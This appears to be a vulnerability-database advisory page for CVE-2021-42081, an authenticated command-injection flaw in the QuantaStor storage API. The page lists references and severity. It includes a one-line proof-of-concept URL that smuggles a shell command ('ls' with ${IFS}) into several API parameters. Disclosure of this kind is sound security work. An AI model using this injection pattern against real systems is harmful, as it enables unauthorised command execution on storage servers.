Critical severity9.1NVD Advisory· Published Jul 10, 2023· Updated Jun 17, 2026
CVE-2021-42081
CVE-2021-42081
Description
An authenticated administrator is allowed to remotely execute arbitrary shell commands via the API.
POC http://<IP_ADDRESS>/qstorapi/storageSystemModify?storageSystem=&newName=quantastor&newDescription=;ls${IFS}-al&newLocation=4&newEnclosureLayoutId=5&newDnsServerList=;ls${IFS}-al&externalHostName=&newNTPServerList=;ls${IFS}-al
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Affected products
2(expand)+ 1 more
- (no CPE)
- (no CPE)range: 0
Patches
Vulnerability mechanics
References
5- csirt.divd.nl/CVE-2021-42081nvdThird Party Advisory
- www.wbsec.nl/osnexusnvdThird Party Advisory
- www.osnexus.com/products/software-defined-storagenvdProduct
- csirt.divd.nl/DIVD-2021-00020/nvd
- www.divd.nl/DIVD-2021-00020nvd
News mentions
0No linked articles in our index yet.